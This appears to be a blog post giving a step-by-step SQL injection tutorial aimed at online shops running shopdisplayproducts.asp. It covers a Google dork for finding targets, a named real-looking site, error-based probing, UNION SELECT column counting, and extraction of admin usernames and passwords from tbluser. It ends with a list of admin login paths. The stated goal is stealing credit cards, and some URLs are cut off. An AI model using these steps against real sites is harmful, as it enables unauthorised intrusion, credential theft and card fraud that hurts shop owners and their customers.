HACKS

How to Hack ShopAdmin & Rape Some Credit Cards

1)go to google.com and put this

inurl:/shopdisplayproducts.asp

now we'll find some site with shopdisplayproducts.asp

Let's see some site
http://www.globalasp.org.uk/store/sh…ucts.asp?id=14

2)
Ok … now we put on end of link this sign ‘


3)Now the link will look like this
http://www.globalasp.org.uk/store/shopdisp….asp?id=14′and we get an error
error look like this
products
microsoft jet database engine error ‘80040e14′

syntax error in string in query expression ‘cc.intcatalogid=p.catalogid and cc.intcategoryid=c.categoryid and cc.intcategoryid = 14′ and hide=0 order by specialoffer desc,cname’.

/store/shop$db.asp, line 467
if we see this error then is hackable ) !!!

4)ok … now we removed ‘
http://www.globalasp.org.uk/store/sh…ucts.asp?id=14and on this add this

%20union%20select% 201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19, 20,21,22,23,24,25,26,27,28,29,
30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46 ,47,48,49,50%20from%20tbluser’

link now is
http://www.globalasp.org.uk/store/shopdisp…%20tbluser’
and put it in the browser we get the same error !!!

5)ok … now you see this numbers …
1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,28,29,30
,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,4 7,48,49,50

now we removed ,50
and we now test
http://www.globalasp.org.uk/store/shopdisp…%20tbluser’
the same error and now we removed and removed number, and when we don’t see this error we must see some site, on this server correct number for
exploit is -> 47 <-

http://www.globalasp.org.uk/store/shopdisp…%20tbluser’

—> this you see 47 is the end number

ok now we put this in browser and don’t see error we see some laptops

ok … now we find on that site numbers 3 and 4
they are small

when we find that numbers we put where are 3 and 4 in link this code line
fldusername,fldpassword

now explotable link is this
http://www.globalasp.org.uk/store/shopdisp…%20tbluser’
there is login for shopadmin and we login !!!

this are path where can be shopadmins too
shopadmin.asp —-> this or … with 1
shopadmin1.asp —-> this is in 90 %
adminindex.html
shopadmin1.asp
shopa_displayorders.asp?page=2
shopa_displayorders.asp
shopa.asp
displayorders.asp
admin.asp
orders.asp
vieworders.asp
view_orders.asp

No comments:

Post a Comment